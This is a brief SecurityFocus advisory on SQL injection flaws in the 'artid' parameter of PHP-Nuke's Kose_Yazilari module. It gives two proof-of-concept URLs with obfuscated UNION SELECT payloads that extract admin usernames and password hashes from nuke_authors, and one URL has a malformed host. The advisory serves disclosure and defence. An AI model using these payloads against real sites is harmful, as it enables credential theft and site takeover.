PHP-Nuke Kose_Yazilari Module 'artid' Parameter Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
http://www.example.commodules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors


 

Privacy Statement
Copyright 2010, SecurityFocus